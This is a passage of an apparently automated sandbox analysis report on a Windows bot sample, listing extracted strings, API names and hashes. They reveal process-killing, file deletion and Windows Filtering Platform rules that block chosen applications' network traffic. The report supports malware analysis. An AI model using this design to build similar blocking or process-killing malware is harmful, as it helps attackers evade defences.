• String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
• API String ID: 4253334766-1535167640
Similarity
• API ID: AddressProc$HandleLibraryLoadModule
• String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
• API String ID: 384173800-4041758303
Similarity
• API ID: fflushfwriteinet_addrntohl
• String ID: 3L$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(filt_idx=%d,res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$setup_ip4_filt
• API String ID: 3255839625-58178811
Similarity
• API ID: Time$FileSystem
• String ID:
• API String ID: 2086374402-0
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$Process$CloseCreateFirstHandleOpenProcess32SnapshotTerminateToolhelp32strcmp
                                                                                                                                                  • String ID: $ $ $ $(name != NULL) || (pid != 0)$C:/Projects/rdp/bot/codebase/process.c$NULL$P$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu)$[E] (%s) -> Failed(name=%s,pid=%lu,err=%08x)$[E] (%s) -> OpenProcess failed(gle=%lu)$[E] (%s) -> Process32First failed(gle=%lu)$[E] (%s) -> Process32Next failed(gle=%lu)$[E] (%s) -> TerminateProcess failed(gle=%lu)$[I] (%s) -> Done(name=%s,pid=%lu)$process_kill$|$~$~$~$~
                                                                                                                                                  • API String ID: 3326156344-4160762685
                                                                                                                                                  • Opcode ID: 111a0d222265b0e9b651161f67789db15db04ee1d6344d95adf1997ddbc43c14
                                                                                                                                                  • Instruction ID: 616fa58f6005be34d536f057dd2b074f44d61c2cf1209604574e43c4a00fd3f3
                                                                                                                                                  • Opcode Fuzzy Hash: 111a0d222265b0e9b651161f67789db15db04ee1d6344d95adf1997ddbc43c14
                                                                                                                                                  • Instruction Fuzzy Hash: 43F10713E3C68386FA747755A880778A260EF1CF55FE04132CA0E4A6D2DD5FED8592E2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$DirectoryErrorLastRemovestrcmpstrcpy$fflushfwrite
                                                                                                                                                  • String ID: (path != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Delete(path_wc=%s,f_path=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_delete
                                                                                                                                                  • API String ID: 2460052984-4087913290
                                                                                                                                                  • Opcode ID: 8dc65f1aecab8ea4f47efe9ab0ad32aca9d45740e90fa263407e76fd36843b16
                                                                                                                                                  • Instruction ID: b87eb040278318ae487ae60475e25120316f17439628246d5e056c7e5789c760
                                                                                                                                                  • Opcode Fuzzy Hash: 8dc65f1aecab8ea4f47efe9ab0ad32aca9d45740e90fa263407e76fd36843b16
                                                                                                                                                  • Instruction Fuzzy Hash: F8A1A123E3C68285F730BB15A8457F9E3A2EF88B55FE40032D94D4A685EE3CE44587E1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$strcatstrcpy$strcmp
                                                                                                                                                  • String ID: (dst != NULL)$(src != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Copy(f_src=%s,f_dst=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(src=%s,dst=%s,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s)$[I] (%s) -> Filtered(f_src=%s,flt=%s)$fs_dir_copy$|
                                                                                                                                                  • API String ID: 2140730755-3699962909
                                                                                                                                                  • Opcode ID: 37f82467a9b4f0f1a8f65e44a39071a822eed56fb51b10aaf508232bd5983809
                                                                                                                                                  • Instruction ID: 1edde6e7e0f830c77f5826b33e03e000c35ddc748fab48dcef79827cf3d3a5f0
                                                                                                                                                  • Opcode Fuzzy Hash: 37f82467a9b4f0f1a8f65e44a39071a822eed56fb51b10aaf508232bd5983809
                                                                                                                                                  • Instruction Fuzzy Hash: 80C18F6393C68691FA24AB11A5443FAE361EF4CF84FD44032DA4D4BA85DF7CE509C7A1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastLocalToken$AllocInformation$CloseFreeHandleLengthOpenProcessfflushfwritememcpy
                                                                                                                                                  • String ID: (hnd != NULL)$(sid != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetTokenInformation failed(hnd=0x%p,gle=%lu)$[E] (%s) -> OpenProcessToken failed(hnd=0x%p,gle=%lu)$process_get_user_sid
                                                                                                                                                  • API String ID: 3826151639-1775164968
                                                                                                                                                  • Opcode ID: fbc27cd743f1523cf46be9fc6bf3ed102a9720512f7d7819e97c2f17d8ad2cd0
                                                                                                                                                  • Instruction ID: 27ed1adbcb98aea5a3bf6f983fcc7221d857c2180d8578f618ee7d669482c42e
                                                                                                                                                  • Opcode Fuzzy Hash: fbc27cd743f1523cf46be9fc6bf3ed102a9720512f7d7819e97c2f17d8ad2cd0
                                                                                                                                                  • Instruction Fuzzy Hash: 76912A63E3D58281FB606B05EC50779A262FF8CFA6F950032D94E47690DE3DE98583E1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FilterFwpmHeap$Add0DeleteKey0Process$AllocFreefflushfwrite
                                                                                                                                                  • String ID: 3L$;9rJ$TL$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$setup_svc_filt
                                                                                                                                                  • API String ID: 3629392964-1470975255
                                                                                                                                                  • Opcode ID: d61932851ce74b3bb3cf1cb972733808165beb13a36d6ba2616358fc88f4bc17
                                                                                                                                                  • Instruction ID: 193e4f470ef11082defb1a41fe513c98b29d4652ffaac59b2a43437b02d0e7a0
                                                                                                                                                  • Opcode Fuzzy Hash: d61932851ce74b3bb3cf1cb972733808165beb13a36d6ba2616358fc88f4bc17
                                                                                                                                                  • Instruction Fuzzy Hash: 17A1C53362D7C285E7609B25B8403AAB7A5FB85B50F844134EACC4BB99DF3DD484CB90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FilterFwpmHeap$Add0DeleteFreeKey0Process$AttributesFilewcslen
                                                                                                                                                  • String ID: 3L$;9rJ$TL$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx)$setup_app_filt
                                                                                                                                                  • API String ID: 2990311666-1793103013
                                                                                                                                                  • Opcode ID: 7da8f20963203a202b6cde00bd6d6d5cb68f077bf040b79e00aef586fafc8510
                                                                                                                                                  • Instruction ID: e855c932889b2cc441cb336e1ba6c527c7e6430c42cea9e72211fb2fad379796
                                                                                                                                                  • Opcode Fuzzy Hash: 7da8f20963203a202b6cde00bd6d6d5cb68f077bf040b79e00aef586fafc8510
                                                                                                                                                  • Instruction Fuzzy Hash: 7B91E52262DBC285F771DB15A84039AB7A1FB85B50F844138EACC4BB99EF3DC544CB90
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$CreateDirectoryErrorLast$strcpy
                                                                                                                                                  • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
                                                                                                                                                  • API String ID: 1104438493-1059260517
                                                                                                                                                  • Opcode ID: 1f30e1d30b345c330644988c5380ee9ae36f7c8538e1076f722eabbeb4c2c8ac
                                                                                                                                                  • Instruction ID: e67ec058cb0185ee374419838b0f89a8278708c668f24f46f855eb1260765d9f
                                                                                                                                                  • Opcode Fuzzy Hash: 1f30e1d30b345c330644988c5380ee9ae36f7c8538e1076f722eabbeb4c2c8ac
                                                                                                                                                  • Instruction Fuzzy Hash: 5D719033E3C28385FB207B16E845BB9A6A2EF5CF54FD41132C94E06691DE2CE945C7A1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastProcess$CloseCodeExitHandle$ObjectSingleTerminateWait
                                                                                                                                                  • String ID: (pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(pid=%lu,err=%08x)$[E] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$[E] (%s) -> TerminateProcess failed(pid=%lugle=%lu)$[I] (%s) -> Done(pid=%lu,exit_code=%08lx)$[W] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$process_close
                                                                                                                                                  • API String ID: 1879646588-710610406
                                                                                                                                                  • Opcode ID: 1cf9dc9fc7508c57831187bf75e953d7a5889ba14419c8eca060db071c248020
                                                                                                                                                  • Instruction ID: aece65baed010af61c8544b80b52aafe9a2b228f7c725b062d2eeb015eb0e863
                                                                                                                                                  • Opcode Fuzzy Hash: 1cf9dc9fc7508c57831187bf75e953d7a5889ba14419c8eca060db071c248020
                                                                                                                                                  • Instruction Fuzzy Hash: F9812963E3C55F86FA61BB15A4806BCE260EF0CF64F9540B2CC5E57294DE2DAC8583E1
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesErrorFileLast
                                                                                                                                                  • String ID: $(attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$P$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu)$c$fs_attr_get$~
                                                                                                                                                  • API String ID: 1799206407-3397184676
                                                                                                                                                  • Opcode ID: ad5b4c89faa54c5bf45b79fd471cebbced5bf5371ffcee2ccaec2d52fd726c37
                                                                                                                                                  • Instruction ID: 9c8d9dcafe201face2f7add0bc062252af15d7faff56202250db463ef56a9dae
                                                                                                                                                  • Opcode Fuzzy Hash: ad5b4c89faa54c5bf45b79fd471cebbced5bf5371ffcee2ccaec2d52fd726c37
                                                                                                                                                  • Instruction Fuzzy Hash: 22515FA393C65F82F6307B05A8443B8E270FF0DFA8FD44132DA9E06594AE6DA545C3A1
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: EnvironmentErrorExpandLastStringsfflushfwrite
                                                                                                                                                  • String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
                                                                                                                                                  • API String ID: 1721699506-2819899730
                                                                                                                                                  • Opcode ID: ed7b55938786d232f4d9094384ec26ffa7b01091c473c9e5d8369086cd487e4c
                                                                                                                                                  • Instruction ID: 2a6b3cf3fb7a24894b9505af4d4517a534aa9cd8b21e5184fc0b3e5f12089a53
                                                                                                                                                  • Opcode Fuzzy Hash: ed7b55938786d232f4d9094384ec26ffa7b01091c473c9e5d8369086cd487e4c
                                                                                                                                                  • Instruction Fuzzy Hash: E1615C63E3C5C791FA20BB54E8043B8A262EB48F54FD58037D94D47A90DE3DE94683E5
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$Resource$FindLoadfflushfwrite
                                                                                                                                                  • String ID: (hnd != NULL)$(out != NULL)$C:/Projects/rdp/bot/codebase/module.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu)$[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu)$[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat$module_get_version
                                                                                                                                                  • API String ID: 2123903355-2019010457
                                                                                                                                                  • Opcode ID: 2bb8962f953552ca7baee075e8185a83bd9eaab00df9a70688943519e183aaa8
                                                                                                                                                  • Instruction ID: 9b4d389e2da09c8236a203c378077c0597d23088636034723fa03558920f39ed
                                                                                                                                                  • Opcode Fuzzy Hash: 2bb8962f953552ca7baee075e8185a83bd9eaab00df9a70688943519e183aaa8
                                                                                                                                                  • Instruction Fuzzy Hash: C0411372A392868AD750EF64E840969B7F0FB4CB64F904136DE5C83794EB3DE544C790
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen
                                                                                                                                                  • String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
                                                                                                                                                  • API String ID: 39653677-3302659514
                                                                                                                                                  • Opcode ID: f89d6af64812923fc6faff55ac4fe52c092536c964cfd2e278180fbf8889cd9d
                                                                                                                                                  • Instruction ID: 50fec7ffd485a48090ab3e14a8d00ec3a07cddfb284ac4e832691dc26c512c83
                                                                                                                                                  • Opcode Fuzzy Hash: f89d6af64812923fc6faff55ac4fe52c092536c964cfd2e278180fbf8889cd9d
                                                                                                                                                  • Instruction Fuzzy Hash: C7415B63D386C784FA24BF55A8046B4A261BF48F54FD88133D94D0B695EF3CA906C3E0
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Processstrlen$AllocFree
                                                                                                                                                  • String ID: (buf != NULL)$(buf_sz != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Memory allocation failed(size=%llu)$ini_get_bytes$mem_alloc
                                                                                                                                                  • API String ID: 1318626975-3964590784
                                                                                                                                                  • Opcode ID: 6081a1e7cbb9f0403e3b78aaba03f0aa28fa7ba909b38010743c373d6169abda
                                                                                                                                                  • Instruction ID: f86ef825bd149197edf92f8060c9675d79e51bc410cfb2199a2c0d0116d552ec
                                                                                                                                                  • Opcode Fuzzy Hash: 6081a1e7cbb9f0403e3b78aaba03f0aa28fa7ba909b38010743c373d6169abda
                                                                                                                                                  • Instruction Fuzzy Hash: 9E315F23A38A8785FA21BF15E8043A5B360EF48FA4FE84031DA4D47695DF7CE80583E0
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesFile$ErrorLast
                                                                                                                                                  • String ID: (attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x)$[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu)$fs_attr_set
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseErrorFileHandleLastUnlockfflushfwrite
                                                                                                                                                  • String ID: ((*lock) != INVALID_HANDLE_VALUE)$(lock != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(lock=%p,err=%08x)$[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu)$[I] (%s) -> Done(lock=%p)$fs_file_unlock
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$AllocCriticalFileSection$AttributesCopyEnterFreeLeavefflushfwritememcpywcslen
                                                                                                                                                  • String ID: [E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorFileLastModuleName
                                                                                                                                                  • String ID: (hnd != NULL)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu)$fs_module_path$wfpblk.lock
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorFileLast$CloseCreateHandleSize
                                                                                                                                                  • String ID: (path != NULL)$(size != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_size
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastObjectSingleWait
                                                                                                                                                  • String ID: $(pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> WaitForSingleObject failed(pid=%lugle=%lu)$process_wait$~
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$CloseCreateErrorHandleLastTime
                                                                                                                                                  • String ID: (ctime != NULL) || (atime != NULL) || (mtime != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_stat
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$_strtoui64
                                                                                                                                                  • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Virtual$ErrorLastProtectQuery
                                                                                                                                                  • String ID: Unknown pseudo relocation protocol version %d.$ VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno
                                                                                                                                                  • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
                                                                                                                                                  • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CopyErrorFileLastfflushfwrite
                                                                                                                                                  • String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DeleteErrorFileLast
                                                                                                                                                  • String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen
